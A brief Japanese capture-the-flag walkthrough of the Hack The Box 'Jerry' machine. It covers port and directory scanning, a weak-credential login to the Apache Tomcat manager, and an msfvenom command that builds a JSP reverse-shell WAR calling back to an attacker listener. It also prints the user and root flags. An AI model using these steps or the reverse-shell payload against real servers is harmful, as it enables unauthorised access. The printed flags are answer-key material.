ジェリー#
ジェリーは Hack The Box の中で比較的簡単なマシンの一つですが、Apache Tomcat はしばしば露出しており、一般的または弱い資格情報で構成されているため、現実的です。
ip アドレス:10.10.10.95
task1 リモートホストはどのポートを開放していますか?
nmap を使用してスキャンし、ポートの開放状況を確認します。
nmap -sV 10.10.10.95
task2 リモートホストはどのサービスを実行していますか?
nmap のスキャン結果から、Apache Tomcat であることがわかります。
task3 Web サーバー上のどの相対パスが Web アプリケーションマネージャに通じていますか?
dirsearch -u http://10.10.10.95:8080/
テストの結果、/manager/html
であることがわかり、ディレクトリスキャンで確認できます。
task4 どの有効なユーザー名とパスワードの組み合わせが Tomcat Web アプリケーションマネージャへの認証に使用できますか? usernameの形式で答えてください。
admin/admin でログイン後
tomcat
task5 どのタイプのファイルがサーバーにデプロイできますか?
もちろん、war パッケージです。
task ユーザーのフラグを提出
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.5 LPORT=3155 -f war > shell.war
http://10.10.10.95:8080/shell/ をクリックします。
シェルがリバウンドします。
このようなファイルはどうやって読み取りますか?
type *.txt
2 つのフラグがあります。
ユーザーフラグ:7004dbcef0f854e0fb401875f26ebd00
task root のフラグを提出
04a8b36e1545a455393d067e772fe90e
http://10.10.10.95:8080/manager/status
ajp の任意ファイル読み取りがあると思ったのですが。